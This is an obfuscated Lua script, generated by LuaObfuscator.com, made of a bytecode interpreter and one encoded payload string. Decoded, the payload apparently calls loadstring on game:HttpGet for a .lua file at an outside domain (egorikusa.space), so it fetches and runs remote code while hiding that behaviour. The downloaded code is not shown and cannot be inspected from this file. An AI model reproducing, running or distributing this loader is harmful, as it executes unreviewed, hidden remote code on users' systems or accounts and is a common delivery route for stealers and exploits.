--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.5) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==79) then local v84=0;while true do if (v84==0) then v19=v0(v3(v30,1,1));return "";end end else local v85=v2(v0(v30,16));if v19 then local v91=v5(v85,v19);v19=nil;return v91;else return v85;end end end);local function v20(v31,v32,v33) if v33 then local v86=(v31/((5 -3)^(v32-(958 -(892 + 65)))))%((5 -3)^(((v33-(1 -0)) -(v32-(2 -1))) + (620 -(555 + 64)))) ;return v86-(v86%(1066 -(68 + 997))) ;else local v87=931 -(857 + 74) ;local v88;while true do if (v87==0) then v88=2^(v32-(569 -(367 + 201))) ;return (((v31%(v88 + v88))>=v88) and (928 -(214 + 713))) or (0 + 0 + 0) ;end end end end local function v21() local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22() local v35=0 -0 ;local v36;local v37;while true do if (v35==(1 -0)) then return (v37 * (469 -213)) + v36 ;end if (v35==((258 + 92) -(87 + 263))) then v36,v37=v1(v16,v18,v18 + (182 -(67 + 113)) );v18=v18 + 2 + 0 ;v35=2 -1 ;end end end local function v23() local v38=0 -0 ;local v39;local v40;local v41;local v42;while true do if (v38==(952 -(802 + 150))) then v39,v40,v41,v42=v1(v16,v18,v18 + (7 -4) );v18=v18 + 4 ;v38=1;end if (v38==(1 -0)) then return (v42 * (12211951 + 4565265)) + (v41 * ((38759 + 27774) -(915 + 82))) + (v40 * (724 -468)) + v39 ;end end end local function v24() local v43=0 -0 ;local v44;local v45;local v46;local v47;local v48;local v49;while true do if (v43==(1190 -(1069 + 118))) then if (v48==0) then if (v47==(0 -0)) then return v49 * ((0 + 0) -(0 -0)) ;else v48=860 -(814 + 45) ;v46=0 + 0 ;end elseif (v48==(3636 -1589)) then return ((v47==((0 -0) + 0)) and (v49 * (1/(791 -((653 -285) + 423))))) or (v49 * NaN) ;end return v8(v49,v48-(3214 -2191) ) * (v46 + (v47/((20 -(10 + 8))^(199 -147)))) ;end if (v43==1) then v46=(1523 -(1020 + 60)) -(416 + 26) ;v47=(v20(v45,(1426 -(630 + 793)) -2 ,(30 -21) + 11 ) * ((3 -1)^(470 -(145 + 293)))) + v44 ;v43=432 -(44 + 386) ;end if (v43==(1488 -((4725 -3727) + 488))) then v48=v20(v45,21,10 + 9 + 12 );v49=((v20(v45,27 + 5 )==1) and  -(773 -((691 -490) + 571))) or (1139 -(116 + 1022)) ;v43=12 -9 ;end if (v43==(0 + 0 + 0)) then v44=v23();v45=v23();v43=(1750 -(760 + 987)) -2 ;end end end local function v25(v50) local v51=1913 -(1624 + 165 + 124) ;local v52;local v53;while true do if (v51==(769 -(745 + 21))) then return v6(v53);end if ((1 + 0)==v51) then v52=v3(v16,v18,(v18 + v50) -(2 -1) );v18=v18 + v50 ;v51=2;end if (v51==(0 -0)) then v52=nil;if  not v50 then local v98=0 -0 ;while true do if ((0 + 0)==v98) then v50=v23();if (v50==(1413 -(447 + 966))) then return "";end break;end end end v51=1 + 0 ;end if (v51==2) then v53={};for v92=1056 -(87 + 968) , #v52 do v53[v92]=v2(v1(v3(v52,v92,v92)));end v51=(35 -22) -(1827 -(1703 + 114)) ;end end end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v54=0;local v55;local v56;local v57;local v58;local v59;local v60;local v61;local v62;local v63;while true do if (v54~=(604 -(268 + 335))) then else v57=nil;v58=nil;v54=2;end if (v54~=2) then else v59=nil;v60=nil;v54=3;end if (v54==(290 -(60 + 230))) then v55=572 -(426 + 146) ;v56=nil;v54=1;end if ((1 + 2)==v54) then v61=nil;v62=nil;v54=1460 -(282 + 1174) ;end if (v54==(815 -(569 + 242))) then v63=nil;while true do if (v55==3) then local v101=0;while true do if (v101==(0 -0)) then v62=nil;v63=nil;v101=1 + 0 ;end if (v101~=(1025 -(706 + 318))) then else v55=1255 -(721 + 530) ;break;end end end if (v55==2) then local v102=1271 -(945 + 326) ;while true do if (v102~=(0 -0)) then else v60=nil;v61=nil;v102=1 + 0 ;end if ((701 -(271 + 429))==v102) then v55=3 + 0 ;break;end end end if (v55~=0) then else local v103=1500 -(1408 + 92) ;while true do if (0~=v103) then else v56=1086 -(461 + 625) ;v57=nil;v103=1;end if (v103==1) then v55=1289 -(993 + 295) ;break;end end end if (v55~=(1 + 3)) then else while true do if (v56==(1174 -(418 + 753))) then v63=nil;while true do local v105=0;local v106;while true do if (v105==0) then v106=0;while true do if (v106~=(1 + 0)) then else if (v57==(0 + 0)) then local v147=0;local v148;while true do if (v147~=0) then else v148=0 + 0 ;while true do if (v148~=1) then else v60={};v57=1;break;end if (v148==0) then local v159=0;while true do if (v159~=(0 + 0)) then else local v160=529 -(406 + 123) ;while true do if (v160~=(1770 -(1749 + 20))) then else v159=1 + 0 ;break;end if (v160==(1322 -(1249 + 73))) then v58={};v59={};v160=1;end end end if ((1 + 0)~=v159) then else v148=1146 -(466 + 679) ;break;end end end end break;end end end if (v57==3) then local v149=0 -0 ;while true do if (v149==(0 -0)) then local v152=1900 -(106 + 1794) ;local v153;while true do if (v152~=(0 + 0)) then else v153=0;while true do if (0~=v153) then else for v161=1,v23() do v59[v161-(1 + 0) ]=v28();end return v61;end end break;end end end end end break;end if (v106==0) then local v146=0;while true do if ((2 -1)~=v146) then else v106=2 -1 ;break;end if (v146==(114 -(4 + 110))) then if (v57~=(586 -(57 + 527))) then else local v154=1427 -(41 + 1386) ;local v155;local v156;while true do if (v154==0) then v155=0;v156=nil;v154=104 -(17 + 86) ;end if (v154==(1 + 0)) then while true do if (v155~=0) then else v156=0;while true do if (v156~=(1 -0)) then else for v164=1,v23() do local v165=0;local v166;local v167;local v168;while true do if (v165~=0) then else v166=0 -0 ;v167=nil;v165=167 -(122 + 44) ;end if (v165==(1 -0)) then v168=nil;while true do if (v166==1) then while true do if (v167~=0) then else v168=v21();if (v20(v168,3 -2 ,1)==0) then local v177=0;local v178;local v179;local v180;while true do if (0==v177) then v178=v20(v168,2,3);v179=v20(v168,4 + 0 ,6);v177=1;end if (v177~=2) then else if (v20(v179,1 + 0 ,1 -0 )==1) then v180[2]=v63[v180[2]];end if (v20(v179,67 -(30 + 35) ,2)~=(1 + 0)) then else v180[1260 -(1043 + 214) ]=v63[v180[3]];end v177=3;end if (v177==3) then if (v20(v179,11 -8 ,1215 -(323 + 889) )==1) then v180[10 -6 ]=v63[v180[4]];end v58[v164]=v180;break;end if (v177~=(581 -(361 + 219))) then else local v182=0;local v183;while true do if (v182==(320 -(53 + 267))) then v183=0 + 0 ;while true do if (v183==0) then local v190=413 -(15 + 398) ;while true do if (v190==(982 -(18 + 964))) then v180={v22(),v22(),nil,nil};if (v178==(0 + 0)) then local v191=0;local v192;while true do if (v191==0) then v192=0;while true do if (v192==0) then v180[853 -(20 + 830) ]=v22();v180[4]=v22();break;end end break;end end elseif (v178==(1 + 0)) then v180[3]=v23();elseif (v178==2) then v180[3]=v23() -(2^16) ;elseif (v178==(129 -(116 + 10))) then local v197=0 + 0 ;local v198;local v199;while true do if (v197==0) then v198=738 -(542 + 196) ;v199=nil;v197=1 -0 ;end if (v197==(1 + 0)) then while true do if (v198~=(0 + 0)) then else v199=0 + 0 ;while true do if (v199==0) then v180[3]=v23() -(2^16) ;v180[10 -6 ]=v22();break;end end break;end end break;end end end v190=1;end if (v190==(2 -1)) then v183=1552 -(1126 + 425) ;break;end end end if (v183==1) then v177=2;break;end end break;end end end end end break;end end break;end if (v166==(405 -(118 + 287))) then local v174=0 -0 ;while true do if (v174~=0) then else v167=1121 -(118 + 1003) ;v168=nil;v174=1;end if (v174==(2 -1)) then v166=1;break;end end end end break;end end end v57=3;break;end if (v156==0) then local v163=377 -(142 + 235) ;while true do if (v163==1) then v156=4 -3 ;break;end if (v163==0) then for v170=1 + 0 ,v62 do local v171=977 -(553 + 424) ;local v172;local v173;while true do if (v171==(1 -0)) then if (v172==(1 + 0)) then v173=v21()~=0 ;elseif (v172==(2 + 0)) then v173=v24();elseif (v172~=3) then else v173=v25();end v63[v170]=v173;break;end if (v171==(0 + 0)) then local v176=0;while true do if (v176==0) then v172=v21();v173=nil;v176=1 + 0 ;end if (v176==(1 + 0)) then v171=1;break;end end end end end v61[6 -3 ]=v21();v163=2 -1 ;end end end end break;end end break;end end end if (v57==(2 -1)) then local v157=0;local v158;while true do if (v157==0) then v158=0 + 0 ;while true do if (v158~=(4 -3)) then else v63={};v57=2;break;end if (v158==0) then v61={v58,v59,nil,v60};v62=v23();v158=1;end end break;end end end v146=1;end end end end break;end end end break;end if (v56==(1329 -(797 + 532))) then v57=0 + 0 ;v58=nil;v56=1 + 0 ;end if (v56~=(2 -1)) then else local v104=1202 -(373 + 829) ;while true do if ((731 -(476 + 255))~=v104) then else v59=nil;v60=nil;v104=1;end if (v104~=1) then else v56=1132 -(369 + 761) ;break;end end end if ((2 + 0)~=v56) then else v61=nil;v62=nil;v56=5 -2 ;end end break;end if (v55==(1 -0)) then v58=nil;v59=nil;v55=240 -(64 + 174) ;end end break;end end end local function v29(v64,v65,v66) local v67=v64[1];local v68=v64[2];local v69=v64[3];return function(...) local v70=v67;local v71=v68;local v72=v69;local v73=v27;local v74=1;local v75= -1;local v76={};local v77={...};local v78=v12("#",...) -1 ;local v79={};local v80={};for v89=0,v78 do if (v89>=v72) then v76[v89-v72 ]=v77[v89 + 1 ];else v80[v89]=v77[v89 + 1 ];end end local v81=(v78-v72) + 1 ;local v82;local v83;while true do local v90=0;while true do if (v90==1) then if (v83<=3) then if (v83<=1) then if (v83>0) then v80[v82[2]]=v66[v82[3]];else v80[v82[2]]();end elseif (v83>2) then local v109=0;local v110;local v111;while true do if (v109==0) then v110=v82[2];v111=v80[v82[3]];v109=1;end if (v109==1) then v80[v110 + 1 ]=v111;v80[v110]=v111[v82[4]];break;end end else local v112=v82[2];v80[v112]=v80[v112](v13(v80,v112 + 1 ,v75));end elseif (v83<=5) then if (v83>4) then local v114=0;local v115;local v116;local v117;local v118;while true do if (v114==2) then for v144=v115,v75 do local v145=0;while true do if (v145==0) then v118=v118 + 1 ;v80[v144]=v116[v118];break;end end end break;end if (1==v114) then v75=(v117 + v115) -1 ;v118=0;v114=2;end if (v114==0) then v115=v82[2];v116,v117=v73(v80[v115](v13(v80,v115 + 1 ,v82[3])));v114=1;end end else v80[v82[2]]=v82[3];end elseif (v83>6) then do return;end else local v121;local v122,v123;local v124;local v125;v80[v82[2]]=v66[v82[3]];v74=v74 + 1 ;v82=v70[v74];v80[v82[2]]=v66[v82[3]];v74=v74 + 1 ;v82=v70[v74];v125=v82[2];v124=v80[v82[3]];v80[v125 + 1 ]=v124;v80[v125]=v124[v82[4]];v74=v74 + 1 ;v82=v70[v74];v80[v82[2]]=v82[3];v74=v74 + 1 ;v82=v70[v74];v125=v82[2];v122,v123=v73(v80[v125](v13(v80,v125 + 1 ,v82[3])));v75=(v123 + v125) -1 ;v121=0;for v135=v125,v75 do v121=v121 + 1 ;v80[v135]=v122[v121];end v74=v74 + 1 ;v82=v70[v74];v125=v82[2];v80[v125]=v80[v125](v13(v80,v125 + 1 ,v75));v74=v74 + 1 ;v82=v70[v74];v80[v82[2]]();v74=v74 + 1 ;v82=v70[v74];do return;end end v74=v74 + 1 ;break;end if (v90==0) then v82=v70[v74];v83=v82[1];v90=1;end end end end;end return v29(v28(),{},v17)(...);end return v15("LOL!043O00030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403343O00682O7470733A2O2F65676F72696B7573612E73706163652F2O38656639306430343930353230363034373439636166622E6C756100083O0012063O00013O00122O000100023O00202O00010001000300122O000300046O000100039O0000026O000100016O00017O00",v9(),...);
